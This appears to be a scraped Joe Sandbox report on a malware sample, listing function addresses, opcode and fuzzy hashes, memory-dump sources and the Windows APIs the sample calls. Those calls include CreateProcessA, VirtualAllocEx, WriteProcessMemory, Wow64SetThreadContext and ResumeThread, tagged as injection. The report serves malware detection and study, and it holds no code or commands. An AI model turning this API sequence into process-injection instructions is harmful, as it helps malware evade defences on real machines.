Snapshot File: hcaresult_0_2_6710000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID: CreateProcess
String ID: Tt$Tt
API String ID: 963392458-2684252306
Opcode ID: 71014c7b2a2ce5fd67882af032e22713f8f42e97d91d5564e3e69b0e6d703fc0
Instruction ID: 1a48a316cb90f1687c4837721d73b15b50d65311b1987ac87cd882c16197ee2a
Opcode Fuzzy Hash: 71014c7b2a2ce5fd67882af032e22713f8f42e97d91d5564e3e69b0e6d703fc0
Instruction Fuzzy Hash: 02A15C71D00719CFEB54CFA9C841BEEBBB2BF49710F14856AE814AB280D7749985CF91

Function 0671AFD8 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0671B20E

Strings

Tt, xrefs: 0671B013
Tt, xrefs: 0671B042

Memory Dump Source

Source File: 00000000.00000002.1290649455.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6710000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID: CreateProcess
String ID: Tt$Tt
API String ID: 963392458-2684252306
Opcode ID: 6794b3c4b2731839c7c153ae48b6c9912867487a8213ccd0391863031a3aa52d
Instruction ID: df1ac4547d5062347e825f0db611a8c587223163a1e4bee637d460d68db2fab7
Opcode Fuzzy Hash: 6794b3c4b2731839c7c153ae48b6c9912867487a8213ccd0391863031a3aa52d
Instruction Fuzzy Hash: 14915D71D00719CFEB54CFA9C841BEEBBB2BF48710F14856AE818AB280D7749985CF91

Function 00B0B519 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 203
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00B0B77E

Strings

Tt, xrefs: 00B0B737

Memory Dump Source

Source File: 00000000.00000002.1279842950.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b00000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID: HandleModule
String ID: Tt
API String ID: 4139908857-1302607582
Opcode ID: 0df61252578b12ffb8a986dfe9401756e54f73a03e1b0bf2a6477ccf4271e6be
Instruction ID: aa91ffc89e4d03279bc87c77302508603b9baba1bfa49c337f40ece47d771eba
Opcode Fuzzy Hash: 0df61252578b12ffb8a986dfe9401756e54f73a03e1b0bf2a6477ccf4271e6be
Instruction Fuzzy Hash: 0B816970A00B058FDB24CF29D455B5ABBF1FF88300F0089ADD48ADBA90DB75E946CB91

Function 00B05E54 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 00B05F11

Strings

Tt, xrefs: 00B05E94

Memory Dump Source

Source File: 00000000.00000002.1279842950.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b00000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID: Create
String ID: Tt
API String ID: 2289755597-1302607582
Opcode ID: 2b5f44f3ddbdc063e52e519c5a98b572c8cc58300740b41610002131b6b22273
Instruction ID: ff190d4072c1fa3b94621961b39c9046c7e0f876b65aa619334888539b5c8a6d
Opcode Fuzzy Hash: 2b5f44f3ddbdc063e52e519c5a98b572c8cc58300740b41610002131b6b22273
Instruction Fuzzy Hash: 2F4190B1C04B19CBDB24DFA9C844B9EBBF5FF49304F20816AD408AB295DBB56946CF50

Function 00B04A60 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 00B05F11

Strings

Tt, xrefs: 00B05E94

Memory Dump Source

Source File: 00000000.00000002.1279842950.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b00000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID: Create
String ID: Tt
API String ID: 2289755597-1302607582
Opcode ID: a88ae8d49ade9da06010288edff32f1a5b9ec3cac88cdd7ab03eec3f9f124c35
Instruction ID: e20a83fe321cd75682f9fbdecd64f46e5974a498122b7e1aaa82fa24eb189608
Opcode Fuzzy Hash: a88ae8d49ade9da06010288edff32f1a5b9ec3cac88cdd7ab03eec3f9f124c35
Instruction Fuzzy Hash: 5441A2B1D04B19CBEB24DFA9C844B9EBBF5BF49304F208069D408AB295D7B56945CF50

Function 0671A949 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 72
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0671A9E0

Strings

Tt, xrefs: 0671A96F

Memory Dump Source

Source File: 00000000.00000002.1290649455.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6710000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID: MemoryProcessWrite
String ID: Tt
API String ID: 3559483778-1302607582
Opcode ID: b7de725eac101117d9b687c42178862a3226412cd4b89fe6e89095570cecc87f
Instruction ID: f85a125cb8005104ec4ad8f43aabc250a3b9b472d4d79dce6ae561bd7a860c1a
Opcode Fuzzy Hash: b7de725eac101117d9b687c42178862a3226412cd4b89fe6e89095570cecc87f
Instruction Fuzzy Hash: F9214875D003099FDB10CFAAC885BEEBBF5FF48310F10842AE958A7240C7799981CBA1

Function 0671A950 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0671A9E0

Strings

Tt, xrefs: 0671A96F

Memory Dump Source

Source File: 00000000.00000002.1290649455.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6710000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID: MemoryProcessWrite
String ID: Tt
API String ID: 3559483778-1302607582
Opcode ID: 023e1d5d118ae7ab89e1dd793c250ad4a96fe278abb233b7102c00b53bf41a9d
Instruction ID: 5aefd4d9747562d62a41f2616f82b881fdb9d1e349ee311893c1b8dadd0fb37f
Opcode Fuzzy Hash: 023e1d5d118ae7ab89e1dd793c250ad4a96fe278abb233b7102c00b53bf41a9d
Instruction Fuzzy Hash: 94212775D003599FDB10CFAAC885BEEBBF5FF48310F10842AE958A7240C7799945CBA5

Function 00B0DA00 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 67
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00B0D9CE,?,?,?,?,?), ref: 00B0DA8F

Strings

Tt, xrefs: 00B0DA27

Memory Dump Source

Source File: 00000000.00000002.1279842950.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b00000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID: DuplicateHandle
String ID: Tt
API String ID: 3793708945-1302607582
Opcode ID: 7d8ad2a9b9d28505d446b96d0c0f68d8297c21147b4134a8118be205aafaac3d
Instruction ID: 62c9287f3497bfd52369e63d7b02245e1721c30b52334a21367ae3e821b34d68
Opcode Fuzzy Hash: 7d8ad2a9b9d28505d446b96d0c0f68d8297c21147b4134a8118be205aafaac3d
Instruction Fuzzy Hash: E02105B59003499FDB10CFAAD484ADEBFF5FB48320F14805AE954A7350C374A945CF64

Function 0671A379 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0671A3FE

Strings

Tt, xrefs: 0671A39C

Memory Dump Source

Source File: 00000000.00000002.1290649455.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6710000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID: ContextThreadWow64
String ID: Tt
API String ID: 983334009-1302607582
Opcode ID: 87267694529f5ce43ee83b5739f3c381468fecbd53c4f201e431791fe38f860f
Instruction ID: f7ea13e734c28c384aeaa2a999df8454cd0ad4f7beab62adadfe05727b9c9f84
Opcode Fuzzy Hash: 87267694529f5ce43ee83b5739f3c381468fecbd53c4f201e431791fe38f860f
Instruction Fuzzy Hash: D3217C71D003098FDB10DFAAC4847EEBBF4EF48310F14842AD819A7241CB78A945CFA5

Function 0671AA39 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0671AAC0

Strings

Tt, xrefs: 0671AA5F

Memory Dump Source

Source File: 00000000.00000002.1290649455.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6710000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID: MemoryProcessRead
String ID: Tt
API String ID: 1726664587-1302607582
Opcode ID: ede35761d9df777ebf4b4915c3ceadf28c045ac11f0ca8c7cb0c68e843273288
Instruction ID: c5c74f9b28772827749b5dd961bbf2652a7ac63bb3796ea3e1505328df574c93
Opcode Fuzzy Hash: ede35761d9df777ebf4b4915c3ceadf28c045ac11f0ca8c7cb0c68e843273288
Instruction Fuzzy Hash: A92125B1C003099FDB10DFAAC880BEEBBF5FF48310F10842AE958A7250D7789941CBA1

Function 00B0B414 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00B0D9CE,?,?,?,?,?), ref: 00B0DA8F

Strings

Tt, xrefs: 00B0DA27

Memory Dump Source

Source File: 00000000.00000002.1279842950.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b00000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID: DuplicateHandle
String ID: Tt
API String ID: 3793708945-1302607582
Opcode ID: ad8195bd78532432cf38e9f6af23d0d295a45bf1b0e47a31470f932d4eb3f573
Instruction ID: e42cf778b48092c727b191716d52b31e31f20c4a66b6c5ebaf5bb6edde5be8b2
Opcode Fuzzy Hash: ad8195bd78532432cf38e9f6af23d0d295a45bf1b0e47a31470f932d4eb3f573
Instruction Fuzzy Hash: 8B21E3B5D043499FDB10DFAAD484AEEBFF4EB48310F24845AE918A7350D378A940CFA5

Function 0671A380 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0671A3FE

Strings

Tt, xrefs: 0671A39C

Memory Dump Source

Source File: 00000000.00000002.1290649455.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6710000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID: ContextThreadWow64
String ID: Tt
API String ID: 983334009-1302607582
Opcode ID: 7801498998f3e2bffb871c9f94d02efe3b6f3dd010bbd0424fa60efef8d06720
Instruction ID: cd472de4cf920e98312f9558f9198e505e4e4b18642caa7db9c631441f3d3f3f
Opcode Fuzzy Hash: 7801498998f3e2bffb871c9f94d02efe3b6f3dd010bbd0424fa60efef8d06720
Instruction Fuzzy Hash: 98215B71D003098FDB14DFAAC4847EEBBF4EF88324F14842AD819A7241CB78A945CFA5

Function 0671AA40 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0671AAC0

Strings

Tt, xrefs: 0671AA5F

Memory Dump Source

Source File: 00000000.00000002.1290649455.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6710000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID: MemoryProcessRead
String ID: Tt
API String ID: 1726664587-1302607582
Opcode ID: 4773f3188cc9b81a3c8902cd472ba3f8c798dfbec55215654410a340e84317d2
Instruction ID: 78a154b2e8a83ee1d1da6efa38879d4418d1b6612a0747d41fdbcb46764011ba
Opcode Fuzzy Hash: 4773f3188cc9b81a3c8902cd472ba3f8c798dfbec55215654410a340e84317d2
Instruction Fuzzy Hash: 282125B1D003499FDB10DFAAC880BEEBBF5FF48310F54842AE958A7250D7789945CBA5

Function 00B0B999 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00B0B7F9,00000800,00000000,00000000), ref: 00B0BA0A

Strings

Tt, xrefs: 00B0B9BF

Memory Dump Source

Source File: 00000000.00000002.1279842950.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b00000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID: LibraryLoad
String ID: Tt
API String ID: 1029625771-1302607582
Opcode ID: b54c47247b5705eb0e8f6714aa80fb8ea6b4253a19179f79d40b0249c964cc56
Instruction ID: 4eb7971e44c585225aa82834284bf5c9877a9c3e6e64ad03220cb944bb3d0bff
Opcode Fuzzy Hash: b54c47247b5705eb0e8f6714aa80fb8ea6b4253a19179f79d40b0249c964cc56
Instruction Fuzzy Hash: 0E1126B6D003498FDB24CF9AD444BDEFBF5EB88310F14842AD569A7240C375A946CFA5

Function 0671A888 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0671A8FE

Strings

Tt, xrefs: 0671A8A7

Memory Dump Source

Source File: 00000000.00000002.1290649455.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6710000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID: AllocVirtual
String ID: Tt
API String ID: 4275171209-1302607582
Opcode ID: bba63a4257ced5fa99e33b7334133a6c8a378001f96eebdfef0e9c62aa771853
Instruction ID: 3289b7d12c90717b10be3fa51db02cd9e5e23f17b49be6aefb187e51de61b3ee
Opcode Fuzzy Hash: bba63a4257ced5fa99e33b7334133a6c8a378001f96eebdfef0e9c62aa771853
Instruction Fuzzy Hash: C2112976D003499FDB20DFAAC844BEEBBF5EF88320F24841AE555A7250C7799941CFA1

Function 00B0B238 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00B0B7F9,00000800,00000000,00000000), ref: 00B0BA0A

Strings

Tt, xrefs: 00B0B9BF

Memory Dump Source

Source File: 00000000.00000002.1279842950.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b00000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID: LibraryLoad
String ID: Tt
API String ID: 1029625771-1302607582
Opcode ID: e9c2d6b7f9daa1a3c8d86921567c28a24e91b6e5b552a181dd3458cd26afa763
Instruction ID: 403b4ee0fad919d69e3461ffbf83f328e7c613dafb5b5a79411f0858b70da1a1
Opcode Fuzzy Hash: e9c2d6b7f9daa1a3c8d86921567c28a24e91b6e5b552a181dd3458cd26afa763
Instruction Fuzzy Hash: 0F1126B6D003499FDB20CF9AC444BDEFBF4EB88320F10846AD919A7240C375A945CFA5

Function 0671A890 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0671A8FE

Strings

Tt, xrefs: 0671A8A7

Memory Dump Source

Source File: 00000000.00000002.1290649455.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6710000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID: AllocVirtual
String ID: Tt
API String ID: 4275171209-1302607582
Opcode ID: 8da61811873c92b1316c83da8a5123025d79854edcf5db1c18a6193008a27a93
Instruction ID: b5908fb01ba998e8ff2d5b9295db4086ef43590841455971f6d111f6cdccb638
Opcode Fuzzy Hash: 8da61811873c92b1316c83da8a5123025d79854edcf5db1c18a6193008a27a93
Instruction Fuzzy Hash: 3B113A75D003499FDB20DFAAC8447EEBBF5EF88320F248419D515A7250C7759541CFA1

Function 06719E90 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 52threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 06719EFA

Strings

Tt, xrefs: 06719EAF

Memory Dump Source

Source File: 00000000.00000002.1290649455.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6710000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID: ResumeThread
String ID: Tt
API String ID: 947044025-1302607582
Opcode ID: 16dc5d2ad7f112258bb4c626ddbb8cf803d801eb4d731bf1fea5d90664ccfeef
Instruction ID: 7df78a847d9448c0b607f1f94598663db2d818add7b26173db04c30f3502b09f
Opcode Fuzzy Hash: 16dc5d2ad7f112258bb4c626ddbb8cf803d801eb4d731bf1fea5d90664ccfeef
Instruction Fuzzy Hash: DA119D71D003088FDB20DFAAC4457EEFBF9EF88210F24842AD515A7240CB79A945CFA5

Function 06719E98 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 06719EFA

Strings

Tt, xrefs: 06719EAF

Memory Dump Source

Source File: 00000000.00000002.1290649455.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6710000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID: ResumeThread
String ID: Tt
API String ID: 947044025-1302607582
Opcode ID: 2953f5976e4b7f76fb0724d364c5b88698c15e4702f4e7f34729a5701fdf5b33
Instruction ID: ef1ecf71c34bb504ae9d9b953f5fcbd8f7aad73331c929ffd0df7f6bba5ce509
Opcode Fuzzy Hash: 2953f5976e4b7f76fb0724d364c5b88698c15e4702f4e7f34729a5701fdf5b33
Instruction Fuzzy Hash: FD113A71D003498FDB24DFAAC4447EEFBF5EF88220F24842AD519A7250C7796945CFA5

Function 00B0B718 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00B0B77E

Strings

Tt, xrefs: 00B0B737

Memory Dump Source

Source File: 00000000.00000002.1279842950.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b00000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID: HandleModule
String ID: Tt
API String ID: 4139908857-1302607582
Opcode ID: 3477e1c0441e073991e8aa48a9b786033258837c62810b67903a1a59dac99eff
Instruction ID: 90b34083bb289a566288a1603f46356a486e8d8fea94f1d0e443d4782b7f2843
Opcode Fuzzy Hash: 3477e1c0441e073991e8aa48a9b786033258837c62810b67903a1a59dac99eff
Instruction Fuzzy Hash: 3311E3B6C007498FDB20CF9AD444BDEFBF5EB88314F14845AD419A7250C379A945CFA5

Function 0671AC80 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 0671ED45

Strings

Tt, xrefs: 0671ED02

Memory Dump Source

Source File: 00000000.00000002.1290649455.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6710000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID: MessagePost
String ID: Tt
API String ID: 410705778-1302607582
Opcode ID: e1382fa392f96645e128c59c4917afc7e919116ac8b2e118c8aad77421523fe2
Instruction ID: a30f20e39c407c2c0b67dcc1e2a34a042d46cb3b14fdce795f443b73599d5f58
Opcode Fuzzy Hash: e1382fa392f96645e128c59c4917afc7e919116ac8b2e118c8aad77421523fe2
Instruction Fuzzy Hash: 301106B5800349DFDB10DF9AC844BDEFBF8EB48310F24841AE954A7210C375A944CFA5

Function 00A2D4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1279551116.0000000000A2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A2D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a2d000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 762c987658bbfa6743df2460c60b105df41106551fcb964cbfc2b6b3de5dcc6e
Instruction ID: 37514192d37df29f5cd5f78cfdee8f248551aa3912c1d5aa6e3e2b0dc8239f28
Opcode Fuzzy Hash: 762c987658bbfa6743df2460c60b105df41106551fcb964cbfc2b6b3de5dcc6e
Instruction Fuzzy Hash: 912125B2504240DFDB15DF18E9C0B26BFA5FB98318F34C579E8090B257C376D856CAA2

Function 00A2D3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1279551116.0000000000A2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A2D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a2d000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f142c6cbff2fdc9393ddf57be82f42ea9da988bd388d764bd97fb0ea09d1e58
Instruction ID: c0b17909cca87112391d16e5c6289213e596709bf61fe78ea53636d33bbacad6
Opcode Fuzzy Hash: 4f142c6cbff2fdc9393ddf57be82f42ea9da988bd388d764bd97fb0ea09d1e58
Instruction Fuzzy Hash: 5D2128B5504244DFDB05EF18E9C0B16BB65FB94324F24C579D90A0F257C336E856CAA2

Function 00A3D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1279598884.0000000000A3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A3D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a3d000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1de6379712c94c44a4bf100fc96fbac5d4de6099fa83027d424d09a1b1fcfae2
Instruction ID: 52fafa641b242bf3e8e61e14dd688772e2dbc3753d76eb18c03254f8abc0dad9
Opcode Fuzzy Hash: 1de6379712c94c44a4bf100fc96fbac5d4de6099fa83027d424d09a1b1fcfae2
Instruction Fuzzy Hash: 9B2104B1504304EFDB15DF90E9C0B66BBA5FB84314F24C66DF84A4B296C376D846CA61

Function 00A3D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1279598884.0000000000A3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A3D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a3d000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2176e6b9a2b3a9b758e87480d58757ca3086c3d9c7f784040e4a6f4cbc112b1d
Instruction ID: 9ffc084102a6b2d153151dd6d1df36aa215460c52b9fb490350f23bdd356a3c2
Opcode Fuzzy Hash: 2176e6b9a2b3a9b758e87480d58757ca3086c3d9c7f784040e4a6f4cbc112b1d
Instruction Fuzzy Hash: 312122B1604300DFDB18DF20E8C0B26BBA5FB85714F24C56DE84B0B286C33AD847CA62

Function 00A2D4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1279551116.0000000000A2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A2D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a2d000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2c4bb083ffa01750429338de36c7bd8c3c5b68e8b11f755f55576fea2132e6f
Instruction ID: c14de258f7358af6c7bf241c0bd61f9b9cd232a521efd76aaacdc8e7b4de9667
Opcode Fuzzy Hash: c2c4bb083ffa01750429338de36c7bd8c3c5b68e8b11f755f55576fea2132e6f
Instruction Fuzzy Hash: AD11D376504280CFDB16CF14D5C4B16BF71FB94314F24C6A9D8494B657C33AD856CBA1

Function 00A2D3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1279551116.0000000000A2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A2D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a2d000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2c4bb083ffa01750429338de36c7bd8c3c5b68e8b11f755f55576fea2132e6f
Instruction ID: 6796119d99d92555189a48d75910321fe3fe663f620ee0a250cc135dd8f3caae
Opcode Fuzzy Hash: c2c4bb083ffa01750429338de36c7bd8c3c5b68e8b11f755f55576fea2132e6f
Instruction Fuzzy Hash: 4611E176404280CFDB16DF04D9C0B16BF72FB94324F24C2A9D8090B657C33AE856CBA1

Function 00A3D017 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1279598884.0000000000A3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A3D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a3d000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3f327db0e2ed1f5e683527615b2bec1ac9a86c970599db5efe8bf84bff6eed3
Instruction ID: 33b58679b1c3e84165c5cdfbc43a3903ed4b23b0ea3a8b8b4d2e94f4adaa4a74
Opcode Fuzzy Hash: d3f327db0e2ed1f5e683527615b2bec1ac9a86c970599db5efe8bf84bff6eed3
Instruction Fuzzy Hash: 8211D075504280CFCB15CF10E5C4B15FB71FB45714F24C6AAE84A4B656C33AD80ACB61

Function 00A3D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1279598884.0000000000A3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A3D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a3d000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3f327db0e2ed1f5e683527615b2bec1ac9a86c970599db5efe8bf84bff6eed3
Instruction ID: 25951fa9d78fa77afa0f221ec96f6f80a508f2355b0da02b4905787d9daa1863
Opcode Fuzzy Hash: d3f327db0e2ed1f5e683527615b2bec1ac9a86c970599db5efe8bf84bff6eed3
Instruction Fuzzy Hash: FF11DD75504280DFCB12CF50D5C0B56FBB1FB84314F28C6AEE8494B696C33AD80ACB61

Function 00A2D731 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1279551116.0000000000A2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A2D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a2d000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ffb3da2b950f20f6911c4200b045c749224a2483885cc0c328df9c4757164c0
Instruction ID: 469a6ac18296c7a71cb4fe22312f7e1e7f193f7b8dedffde63e6ff9d1d664aee
Opcode Fuzzy Hash: 8ffb3da2b950f20f6911c4200b045c749224a2483885cc0c328df9c4757164c0
Instruction Fuzzy Hash: F801A7714043549BE7104F29DD84766BBA8EF81324F28C43AED495E283D27D9840DAB2

Function 00A2D730 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1279551116.0000000000A2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A2D000, based on PE: false

Joe Sandbox IDA Plugin

